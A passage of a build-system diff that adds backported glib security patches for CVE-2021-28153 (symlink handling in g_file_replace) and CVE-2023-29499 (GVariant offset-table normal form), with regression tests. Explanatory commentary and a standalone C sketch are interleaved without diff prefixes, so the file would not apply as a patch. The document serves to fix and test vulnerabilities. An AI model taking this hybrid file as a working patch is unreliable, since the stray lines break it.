++ g_test_add ("/gsettings/keyfile/no-root-group", Fixture, NULL, setup, test_keyfile_no_root_group, teardown);
+ g_test_add_func ("/gsettings/child-schema", test_child_schema);
+ g_test_add_func ("/gsettings/strinfo", test_strinfo);
+ g_test_add_func ("/gsettings/enums", test_enums);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
new file mode 100644
index 0000000000..c89ca20726
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
@@ -0,0 +1,27 @@
+From 78420a75aeb70569a8cd79fa0fea7b786b6f785f Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:33:38 +0000
+Subject: [PATCH 1/5] glocalfileoutputstream: Fix a typo in a comment
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -851,7 +851,7 @@ handle_overwrite_open (const char *fi
+ mode = mode_from_flags_or_info (flags, reference_info);
+
+ /* We only need read access to the original file if we are creating a backup.
+- * We also add O_CREATE to avoid a race if the file was just removed */
++ * We also add O_CREAT to avoid a race if the file was just removed */
+ if (create_backup || readable)
+ open_flags = O_RDWR | O_CREAT | O_BINARY;
+ else
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
new file mode 100644
index 0000000000..8a35bab4de
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
@@ -0,0 +1,42 @@
+From 32d3d02a50e7dcec5f4cf7908e7ac88d575d8fc5 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:34:32 +0000
+Subject: [PATCH 2/5] tests: Stop using g_test_bug_base() in file tests
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Since a following commit is going to add a new test which references
+Gitlab, it’s best to move the URI bases inside the test cases.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/file.c | 4 +---
+ 1 file changed, 1 insertion(+), 3 deletions(-)
+
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -685,7 +685,7 @@ test_replace_cancel (void)
+ guint count;
+ GError *error = NULL;
+
+- g_test_bug ("629301");
++ g_test_bug ("https://bugzilla.gnome.org/629301");
+
+ path = g_dir_make_tmp ("g_file_replace_cancel_XXXXXX", &error);
+ g_assert_no_error (error);
+@@ -1784,8 +1784,6 @@ main (int argc, char *argv[])
+ {
+ g_test_init (&argc, &argv, NULL);
+
+- g_test_bug_base ("http://bugzilla.gnome.org/");
+-
+ g_test_add_func ("/file/basic", test_basic);
+ g_test_add_func ("/file/build-filename", test_build_filename);
+ g_test_add_func ("/file/parent", test_parent);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
new file mode 100644
index 0000000000..a82febd26e
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From ce0eb088a68171eed3ac217cb92a72e36eb57d1b Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Mar 2021 16:05:55 +0000
+Subject: [PATCH 3/5] glocalfileoutputstream: Factor out a flag check
+
+This clarifies the code a little. It introduces no functional changes.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -847,6 +847,7 @@ handle_overwrite_open (const char *fi
+ int res;
+ int mode;
+ int errsv;
++ gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION);
+
+ mode = mode_from_flags_or_info (flags, reference_info);
+
+@@ -954,7 +955,7 @@ handle_overwrite_open (const char *fi
+ * to a backup file and rewrite the contents of the file.
+ */
+
+- if ((flags & G_FILE_CREATE_REPLACE_DESTINATION) ||
++ if (replace_destination_set ||
+ (!(original_stat.st_nlink > 1) && !is_symlink))
+ {
+ char *dirname, *tmp_filename;
+@@ -973,7 +974,7 @@ handle_overwrite_open (const char *fi
+
+ /* try to keep permissions (unless replacing) */
+
+- if ( ! (flags & G_FILE_CREATE_REPLACE_DESTINATION) &&
++ if (!replace_destination_set &&
+ (
+ #ifdef HAVE_FCHOWN
+ fchown (tmpfd, original_stat.st_uid, original_stat.st_gid) == -1 ||
+@@ -1112,7 +1113,7 @@ handle_overwrite_open (const char *fi
+ }
+ }
+
+- if (flags & G_FILE_CREATE_REPLACE_DESTINATION)
++ if (replace_destination_set)
+ {
+ g_close (fd, NULL);
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
new file mode 100644
index 0000000000..5b106e8474
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
@@ -0,0 +1,265 @@
+Backport of:
+
+From 317b3b587058a05dca95d56dac26568c5b098d33 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:36:07 +0000
+Subject: [PATCH 4/5] glocalfileoutputstream: Fix CREATE_REPLACE_DESTINATION
+ with symlinks
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `G_FILE_CREATE_REPLACE_DESTINATION` flag is equivalent to unlinking
+the destination file and re-creating it from scratch. That did
+previously work, but in the process the code would call `open(O_CREAT)`
+on the file. If the file was a dangling symlink, this would create the
+destination file (empty). That’s not an intended side-effect, and has
+security implications if the symlink is controlled by a lower-privileged
+process.
+
+Fix that by not opening the destination file if it’s a symlink, and
+adjusting the rest of the code to cope with
+ - the fact that `fd == -1` is not an error iff `is_symlink` is true,
+ - and that `original_stat` will contain the `lstat()` results for the
+ symlink now, rather than the `stat()` results for its target (again,
+ iff `is_symlink` is true).
+
+This means that the target of the dangling symlink is no longer created,
+which was the bug. The symlink itself continues to be replaced (as
+before) with the new file — this is the intended behaviour of
+`g_file_replace()`.
+
+The behaviour for non-symlink cases, or cases where the symlink was not
+dangling, should be unchanged.
+
+Includes a unit test.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2325
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 77 ++++++++++++++++++-------
+ gio/tests/file.c | 108 +++++++++++++++++++++++++++++++++++
+ 2 files changed, 163 insertions(+), 22 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -875,16 +875,22 @@ handle_overwrite_open (const char *fi
+ /* Could be a symlink, or it could be a regular ELOOP error,
+ * but then the next open will fail too. */
+ is_symlink = TRUE;
+- fd = g_open (filename, open_flags, mode);
++ if (!replace_destination_set)
++ fd = g_open (filename, open_flags, mode);
+ }
+-#else
+- fd = g_open (filename, open_flags, mode);
+- errsv = errno;
++#else /* if !O_NOFOLLOW */
+ /* This is racy, but we do it as soon as possible to minimize the race */
+ is_symlink = g_file_test (filename, G_FILE_TEST_IS_SYMLINK);
++
++ if (!is_symlink || !replace_destination_set)
++ {
++ fd = g_open (filename, open_flags, mode);
++ errsv = errno;
++ }
+ #endif
+
+- if (fd == -1)
++ if (fd == -1 &&
++ (!is_symlink || !replace_destination_set))
+ {
+ char *display_name = g_filename_display_name (filename);
+ g_set_error (error, G_IO_ERROR,
+@@ -898,7 +904,14 @@ handle_overwrite_open (const char *fi
+ #ifdef G_OS_WIN32
+ res = GLIB_PRIVATE_CALL (g_win32_fstat) (fd, &original_stat);
+ #else
+- res = fstat (fd, &original_stat);
++ if (!is_symlink)
++ {
++ res = fstat (fd, &original_stat);
++ }
++ else
++ {
++ res = lstat (filename, &original_stat);
++ }
+ #endif
+ errsv = errno;
+
+@@ -917,16 +930,27 @@ handle_overwrite_open (const char *fi
+ if (!S_ISREG (original_stat.st_mode))
+ {
+ if (S_ISDIR (original_stat.st_mode))
+- g_set_error_literal (error,
+- G_IO_ERROR,
+- G_IO_ERROR_IS_DIRECTORY,
+- _("Target file is a directory"));
+- else
+- g_set_error_literal (error,
++ {
++ g_set_error_literal (error,
++ G_IO_ERROR,
++ G_IO_ERROR_IS_DIRECTORY,
++ _("Target file is a directory"));
++ goto err_out;
++ }
++ else if (!is_symlink ||
++#ifdef S_ISLNK
++ !S_ISLNK (original_stat.st_mode)
++#else
++ FALSE
++#endif
++ )
++ {
++ g_set_error_literal (error,
+ G_IO_ERROR,
+ G_IO_ERROR_NOT_REGULAR_FILE,
+ _("Target file is not a regular file"));
+- goto err_out;
++ goto err_out;
++ }
+ }
+
+ if (etag != NULL)
+@@ -1007,7 +1031,8 @@ handle_overwrite_open (const char *fi
+ }
+ }
+
+- g_close (fd, NULL);
++ if (fd >= 0)
++ g_close (fd, NULL);
+ *temp_filename = tmp_filename;
+ return tmpfd;
+ }
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -804,6 +804,113 @@ test_replace_cancel (void)
+ g_object_unref (tmpdir);
+ }
+
++static void
++test_replace_symlink (void)
++{
++#ifdef G_OS_UNIX
++ gchar *tmpdir_path = NULL;
++ GFile *tmpdir = NULL, *source_file = NULL, *target_file = NULL;
++ GFileOutputStream *stream = NULL;
++ const gchar *new_contents = "this is a test message which should be written to source and not target";
++ gsize n_written;
++ GFileEnumerator *enumerator = NULL;
++ GFileInfo *info = NULL;
++ gchar *contents = NULL;
++ gsize length = 0;
++ GError *local_error = NULL;
++
++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2325");
++ g_test_summary ("Test that G_FILE_CREATE_REPLACE_DESTINATION doesn’t follow symlinks");
++
++ /* Create a fresh, empty working directory. */
++ tmpdir_path = g_dir_make_tmp ("g_file_replace_symlink_XXXXXX", &local_error);
++ g_assert_no_error (local_error);
++ tmpdir = g_file_new_for_path (tmpdir_path);
++
++ g_test_message ("Using temporary directory %s", tmpdir_path);
++ g_free (tmpdir_path);
++
++ /* Create symlink `source` which points to `target`. */
++ source_file = g_file_get_child (tmpdir, "source");
++ target_file = g_file_get_child (tmpdir, "target");
++ g_file_make_symbolic_link (source_file, "target", NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ /* Ensure that `target` doesn’t exist */
++ g_assert_false (g_file_query_exists (target_file, NULL));
++
++ /* Replace the `source` symlink with a regular file using
++ * %G_FILE_CREATE_REPLACE_DESTINATION, which should replace it *without*
++ * following the symlink */
++ stream = g_file_replace (source_file, NULL, FALSE /* no backup */,
++ G_FILE_CREATE_REPLACE_DESTINATION, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_output_stream_write_all (G_OUTPUT_STREAM (stream), new_contents, strlen (new_contents),
++ &n_written, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_cmpint (n_written, ==, strlen (new_contents));
++
++ g_output_stream_close (G_OUTPUT_STREAM (stream), NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_clear_object (&stream);
++
++ /* At this point, there should still only be one file: `source`. It should
++ * now be a regular file. `target` should not exist. */
++ enumerator = g_file_enumerate_children (tmpdir,
++ G_FILE_ATTRIBUTE_STANDARD_NAME ","
++ G_FILE_ATTRIBUTE_STANDARD_TYPE,
++ G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_nonnull (info);
++
++ g_assert_cmpstr (g_file_info_get_name (info), ==, "source");
++ g_assert_cmpint (g_file_info_get_file_type (info), ==, G_FILE_TYPE_REGULAR);
++
++ g_clear_object (&info);
++
++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_null (info);
++
++ g_file_enumerator_close (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_clear_object (&enumerator);
++
++ /* Double-check that `target` doesn’t exist */
++ g_assert_false (g_file_query_exists (target_file, NULL));
++
++ /* Check the content of `source`. */
++ g_file_load_contents (source_file,
++ NULL,
++ &contents,
++ &length,
++ NULL,
++ &local_error);
++ g_assert_no_error (local_error);
++ g_assert_cmpstr (contents, ==, new_contents);
++ g_assert_cmpuint (length, ==, strlen (new_contents));
++ g_free (contents);
++
++ /* Tidy up. */
++ g_file_delete (source_file, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_file_delete (tmpdir, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_clear_object (&target_file);
++ g_clear_object (&source_file);
++ g_clear_object (&tmpdir);
++#else /* if !G_OS_UNIX */
++ g_test_skip ("Symlink replacement tests can only be run on Unix");
++#endif
++}
++
+ static void
+ on_file_deleted (GObject *object,
+ GAsyncResult *result,
+@@ -1752,6 +1859,7 @@ main (int argc, char *argv[])
+ g_test_add_data_func ("/file/async-create-delete/4096", GINT_TO_POINTER (4096), test_create_delete);
+ g_test_add_func ("/file/replace-load", test_replace_load);
+ g_test_add_func ("/file/replace-cancel", test_replace_cancel);
++ g_test_add_func ("/file/replace-symlink", test_replace_symlink);
+ g_test_add_func ("/file/async-delete", test_async_delete);
+ #ifdef G_OS_UNIX
+ g_test_add_func ("/file/copy-preserve-mode", test_copy_preserve_mode);
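
The commit message above turns on a detail of open(): with O_CREAT and without O_NOFOLLOW, opening a dangling symlink creates the file the symlink points to. Below is a minimal standalone sketch of that behaviour and of the O_NOFOLLOW/lstat() detection the patch relies on, assuming a POSIX (Linux) system; it is illustrative only and not part of the patch.

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

int
main (void)
{
  struct stat st;
  int fd;

  /* Dangling symlink: "source" points at a non-existent "target". */
  symlink ("target", "source");

  /* A naive replacement would do this and silently create "target",
   * which is the security problem the patch fixes:
   *   fd = open ("source", O_WRONLY | O_CREAT, 0644);
   */

  /* Refuse to follow the final symlink instead. */
  fd = open ("source", O_WRONLY | O_CREAT | O_NOFOLLOW, 0644);
  if (fd < 0 && errno == ELOOP &&
      lstat ("source", &st) == 0 && S_ISLNK (st.st_mode))
    printf ("source is a symlink; replace it without following it\n");
  else if (fd >= 0)
    close (fd);

  unlink ("source");
  return 0;
}
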
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
new file mode 100644
index 0000000000..2334147f7d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
@@ -0,0 +1,55 @@
+From 6c6439261bc7a8a0627519848a7222b3e1bd4ffe Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:42:24 +0000
+Subject: [PATCH 5/5] glocalfileoutputstream: Add a missing O_CLOEXEC flag to
+ replace()
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -58,6 +58,12 @@
+ #define O_BINARY 0
+ #endif
+
++#ifndef O_CLOEXEC
++#define O_CLOEXEC 0
++#else
++#define HAVE_O_CLOEXEC 1
++#endif
++
+ struct _GLocalFileOutputStreamPrivate {
+ char *tmp_filename;
+ char *original_filename;
+@@ -1223,7 +1229,7 @@ _g_local_file_output_stream_replace (con
+ sync_on_close = FALSE;
+
+ /* If the file doesn't exist, create it */
+- open_flags = O_CREAT | O_EXCL | O_BINARY;
++ open_flags = O_CREAT | O_EXCL | O_BINARY | O_CLOEXEC;
+ if (readable)
+ open_flags |= O_RDWR;
+ else
+@@ -1253,8 +1259,11 @@ _g_local_file_output_stream_replace (con
+ set_error_from_open_errno (filename, error);
+ return NULL;
+ }
+-
+-
++#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD)
++ else
++ fcntl (fd, F_SETFD, FD_CLOEXEC);
++#endif
++
+ stream = g_object_new (G_TYPE_LOCAL_FILE_OUTPUT_STREAM, NULL);
+ stream->priv->fd = fd;
+ stream->priv->sync_on_close = sync_on_close;
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
new file mode 100644
index 0000000000..ce90586290
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
@@ -0,0 +1,290 @@
+From 5f4485c4ff57fdefb1661531788def7ca5a47328 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 04:19:44 +0000
+Subject: [PATCH] gvariant-serialiser: Check offset table entry size is minimal
+
+The entries in an offset table (which is used for variable sized arrays
+and tuples containing variable sized members) are sized so that they can
+address every byte in the overall variant.
+
+The specification requires that for a variant to be in normal form, its
+offset table entries must be the minimum width such that they can
+address every byte in the variant.
+
+That minimality requirement was not checked in
+`g_variant_is_normal_form()`, leading to two different byte arrays being
+interpreted as the normal form of a given variant tree. That kind of
+confusion could potentially be exploited, and is certainly a bug.
+
+Fix it by adding the necessary checks on offset table entry width, and
+unit tests.
+
+Spotted by William Manley.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2794
+
+CVE: CVE-2023-29499
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/5f4485c4ff57fdefb1661531788def7ca5a47328]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
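
For reference, the size rule the new checks appeal to works as follows (a sketch mirroring gvs_calculate_total_size(), whose definition is not in the hunks below): the framing-offset width is the smallest of 1, 2, 4 or 8 bytes for which the resulting total size is still addressable. For 128 empty arrays the data ends at byte 0 and there are 128 offsets, so the only normal serialised size is 0 + 1 * 128 = 128 bytes; a 256-byte serialisation of the same value necessarily uses 2-byte offsets and must be rejected as non-normal.

#include <glib.h>

/* Sketch only, mirroring gvs_calculate_total_size (): total serialised size
 * for a container whose data ends at @body_size and which needs @offsets
 * framing-offset entries, using the smallest width that can address it. */
static gsize
calculate_total_size (gsize body_size, gsize offsets)
{
  if (body_size + 1 * offsets <= G_MAXUINT8)
    return body_size + 1 * offsets;
  if (body_size + 2 * offsets <= G_MAXUINT16)
    return body_size + 2 * offsets;
  if (body_size + 4 * offsets <= G_MAXUINT32)
    return body_size + 4 * offsets;
  return body_size + 8 * offsets;
}
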
+---
+ glib/gvariant-serialiser.c | 19 +++-
+ glib/tests/gvariant.c | 176 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 194 insertions(+), 1 deletion(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 0bf7243..5aa2cbc 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -694,6 +694,10 @@ gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+ out.data_size = last_end;
+ out.array = value.data + last_end;
+ out.length = offsets_array_size / out.offset_size;
++
++ if (out.length > 0 && gvs_calculate_total_size (last_end, out.length) != value.size)
++ return out; /* offset size not minimal */
++
+ out.is_normal = TRUE;
+
+ return out;
+@@ -1201,6 +1205,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ gsize length;
+ gsize offset;
+ gsize i;
++ gsize offset_table_size;
+
+ /* as per the comment in gvs_tuple_get_child() */
+ if G_UNLIKELY (value.data == NULL && value.size != 0)
+@@ -1305,7 +1310,19 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ }
+ }
+
+- return offset_ptr == offset;
++ /* @offset_ptr has been counting backwards from the end of the variant, to
++ * find the beginning of the offset table. @offset has been counting forwards
++ * from the beginning of the variant to find the end of the data. They should
++ * have met in the middle. */
++ if (offset_ptr != offset)
++ return FALSE;
++
++ offset_table_size = value.size - offset_ptr;
++ if (value.size > 0 &&
++ gvs_calculate_total_size (offset, offset_table_size / offset_size) != value.size)
++ return FALSE; /* offset size not minimal */
++
++ return TRUE;
+ }
+
+ /* Variants {{{2
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index d640c81..4ce0e4f 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5092,6 +5092,86 @@ test_normal_checking_array_offsets2 (void)
+ g_variant_unref (variant);
+ }
+
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_array_offsets_minimal_sized (void)
++{
++ GVariantBuilder builder;
++ gsize i;
++ GVariant *aay_constructed = NULL;
++ const guint8 *data = NULL;
++ guint8 *data_owned = NULL;
++ GVariant *aay_deserialised = NULL;
++ GVariant *aay_normalised = NULL;
++
++ /* Construct an array of type aay, consisting of 128 elements which are each
++ * an empty array, i.e. `[[] * 128]`. This is chosen because the inner
++ * elements are variable sized (making the outer array variable sized, so it
++ * must have an offset table), but they are also zero-sized when serialised.
++ * So the serialised representation of @aay_constructed consists entirely of
++ * its offset table, which is entirely zeroes.
++ *
++ * The array is chosen to be 128 elements long because that means offset
++ * table entries which are 1 byte long. If the elements in the array were
++ * non-zero-sized (to the extent that the overall array is ≥256 bytes long),
++ * the offset table entries would end up being 2 bytes long. */
++ g_variant_builder_init (&builder, G_VARIANT_TYPE ("aay"));
++
++ for (i = 0; i < 128; i++)
++ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++ aay_constructed = g_variant_builder_end (&builder);
++
++ /* Verify that the constructed array is in normal form, and its serialised
++ * form is `b'\0' * 128`. */
++ g_assert_true (g_variant_is_normal_form (aay_constructed));
++ g_assert_cmpuint (g_variant_n_children (aay_constructed), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_constructed), ==, 128);
++
++ data = g_variant_get_data (aay_constructed);
++ for (i = 0; i < g_variant_get_size (aay_constructed); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Construct a serialised `aay` GVariant which is `b'\0' * 256`. This has to
++ * be a non-normal form of `[[] * 128]`, with 2-byte-long offset table
++ * entries, because each offset table entry has to be able to reference all of
++ * the byte boundaries in the container. All the entries in the offset table
++ * are zero, so all the elements of the array are zero-sized. */
++ data = data_owned = g_malloc0 (256);
++ aay_deserialised = g_variant_new_from_data (G_VARIANT_TYPE ("aay"),
++ data,
++ 256,
++ FALSE,
++ g_free,
++ g_steal_pointer (&data_owned));
++
++ g_assert_false (g_variant_is_normal_form (aay_deserialised));
++ g_assert_cmpuint (g_variant_n_children (aay_deserialised), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_deserialised), ==, 256);
++
++ data = g_variant_get_data (aay_deserialised);
++ for (i = 0; i < g_variant_get_size (aay_deserialised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Get its normal form. That should change the serialised size. */
++ aay_normalised = g_variant_get_normal_form (aay_deserialised);
++
++ g_assert_true (g_variant_is_normal_form (aay_normalised));
++ g_assert_cmpuint (g_variant_n_children (aay_normalised), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_normalised), ==, 128);
++
++ data = g_variant_get_data (aay_normalised);
++ for (i = 0; i < g_variant_get_size (aay_normalised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ g_variant_unref (aay_normalised);
++ g_variant_unref (aay_deserialised);
++ g_variant_unref (aay_constructed);
++}
++
+ /* Test that a tuple with invalidly large values in its offset table is
+ * normalised successfully without looping infinitely. */
+ static void
+@@ -5286,6 +5366,98 @@ test_normal_checking_tuple_offsets4 (void)
+ g_variant_unref (variant);
+ }
+
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_tuple_offsets_minimal_sized (void)
++{
++ GString *type_string = NULL;
++ GVariantBuilder builder;
++ gsize i;
++ GVariant *ray_constructed = NULL;
++ const guint8 *data = NULL;
++ guint8 *data_owned = NULL;
++ GVariant *ray_deserialised = NULL;
++ GVariant *ray_normalised = NULL;
++
++ /* Construct a tuple of type (ay…ay), consisting of 129 members which are each
++ * an empty array, i.e. `([] * 129)`. This is chosen because the inner
++ * members are variable sized, so the outer tuple must have an offset table,
++ * but they are also zero-sized when serialised. So the serialised
++ * representation of @ray_constructed consists entirely of its offset table,
++ * which is entirely zeroes.
++ *
++ * The tuple is chosen to be 129 members long because that means it has 128
++ * offset table entries which are 1 byte long each. If the members in the
++ * tuple were non-zero-sized (to the extent that the overall tuple is ≥256
++ * bytes long), the offset table entries would end up being 2 bytes long.
++ *
++ * 129 members are used unlike 128 array elements in
++ * test_normal_checking_array_offsets_minimal_sized(), because the last member
++ * in a tuple never needs an offset table entry. */
++ type_string = g_string_new ("");
++ g_string_append_c (type_string, '(');
++ for (i = 0; i < 129; i++)
++ g_string_append (type_string, "ay");
++ g_string_append_c (type_string, ')');
++
++ g_variant_builder_init (&builder, G_VARIANT_TYPE (type_string->str));
++
++ for (i = 0; i < 129; i++)
++ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++ ray_constructed = g_variant_builder_end (&builder);
++
++ /* Verify that the constructed tuple is in normal form, and its serialised
++ * form is `b'\0' * 128`. */
++ g_assert_true (g_variant_is_normal_form (ray_constructed));
++ g_assert_cmpuint (g_variant_n_children (ray_constructed), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_constructed), ==, 128);
++
++ data = g_variant_get_data (ray_constructed);
++ for (i = 0; i < g_variant_get_size (ray_constructed); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Construct a serialised `(ay…ay)` GVariant which is `b'\0' * 256`. This has
++ * to be a non-normal form of `([] * 129)`, with 2-byte-long offset table
++ * entries, because each offset table entry has to be able to reference all of
++ * the byte boundaries in the container. All the entries in the offset table
++ * are zero, so all the members of the tuple are zero-sized. */
++ data = data_owned = g_malloc0 (256);
++ ray_deserialised = g_variant_new_from_data (G_VARIANT_TYPE (type_string->str),
++ data,
++ 256,
++ FALSE,
++ g_free,
++ g_steal_pointer (&data_owned));
++
++ g_assert_false (g_variant_is_normal_form (ray_deserialised));
++ g_assert_cmpuint (g_variant_n_children (ray_deserialised), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_deserialised), ==, 256);
++
++ data = g_variant_get_data (ray_deserialised);
++ for (i = 0; i < g_variant_get_size (ray_deserialised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Get its normal form. That should change the serialised size. */
++ ray_normalised = g_variant_get_normal_form (ray_deserialised);
++
++ g_assert_true (g_variant_is_normal_form (ray_normalised));
++ g_assert_cmpuint (g_variant_n_children (ray_normalised), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_normalised), ==, 128);
++
++ data = g_variant_get_data (ray_normalised);
++ for (i = 0; i < g_variant_get_size (ray_normalised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ g_variant_unref (ray_normalised);
++ g_variant_unref (ray_deserialised);
++ g_variant_unref (ray_constructed);
++ g_string_free (type_string, TRUE);
++}
++
